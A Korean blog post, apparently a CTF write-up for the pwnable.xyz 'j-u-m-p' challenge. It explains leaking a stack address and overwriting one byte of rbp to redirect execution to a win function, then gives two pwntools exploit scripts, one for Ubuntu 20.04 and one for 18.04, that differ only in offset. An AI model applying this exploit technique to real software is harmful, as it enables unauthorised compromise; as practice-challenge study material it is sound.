스택 주소를 릭할 수 있고 rbp를 1byte overwrite할 수 있다
rbp 계산 잘해서 rbp-0x11을 1byte변조해서 win함수로 만들고 rbp-0x8로 이동해서 그쪽으로 jmp하도록 하면된다
로컬에서는 되는데 리모트에서는 안된다...
ubuntu 18.04로 해보면 익스가 되는데 오프셋 차이인 것 같다
ubntu 20.02
from pwn import *
#context.log_level = "debug"
#p = remote("svc.pwnable.xyz", 30012)
p = process("./j-u-m-p")
#gdb.attach(p)
def ovr_data(data):
p.recvuntil(b"> ")
p.send(data)
def st_leak():
p.recvuntil(b"> ")
p.sendline(b"3")
st_leak()
p.recvuntil(b"0x")
leak = int(p.recv(12), 16)
main_rbp = leak - 0x108
target_ret = main_rbp - 0x8
log.info("environ: " + hex(leak))
log.info("main rbp: " + hex(main_rbp))
log.info("target addr: " + hex(target_ret))
payload = b"A" * 0x20
payload += bytes([(target_ret & 0xff) + 0x11])
ovr_data(payload)
p.recvuntil(b"> ")
p.sendline(b"123")
payload = b"1"
payload += b"\x00"
payload += b"A" * 0x1e
payload += bytes([(target_ret & 0xff) + 8])
ovr_data(payload)
p.interactive()
ubuntu 18.04
from pwn import *
#context.log_level = "debug"
p = remote("svc.pwnable.xyz", 30012)
#p = process("./j-u-m-p")
#gdb.attach(p)
def ovr_data(data):
p.recvuntil(b"> ")
p.send(data)
def st_leak():
p.recvuntil(b"> ")
p.sendline(b"3")
st_leak()
p.recvuntil(b"0x")
leak = int(p.recv(12), 16)
main_rbp = leak - 0xf8
target_ret = main_rbp - 0x8
log.info("environ: " + hex(leak))
log.info("main rbp: " + hex(main_rbp))
log.info("target addr: " + hex(target_ret))
payload = b"A" * 0x20
payload += bytes([(target_ret & 0xff) + 0x11])
ovr_data(payload)
p.recvuntil(b"> ")
p.sendline(b"123")
payload = b"1"
payload += b"\x00"
payload += b"A" * 0x1e
payload += bytes([(target_ret & 0xff) + 8])
ovr_data(payload)
p.interactive()'pwn > pwnable.xyz' 카테고리의 다른 글
| pwnable.xyz / iape (0) | 2022.05.19 |
|---|---|
| pwnable.xyz / strcat (0) | 2022.05.18 |
| pwnable.xyz / sus (0) | 2022.05.14 |
| pwnable.xyz / fspoo (0) | 2022.05.13 |
| pwnable.xyz / Game (0) | 2022.05.12 |
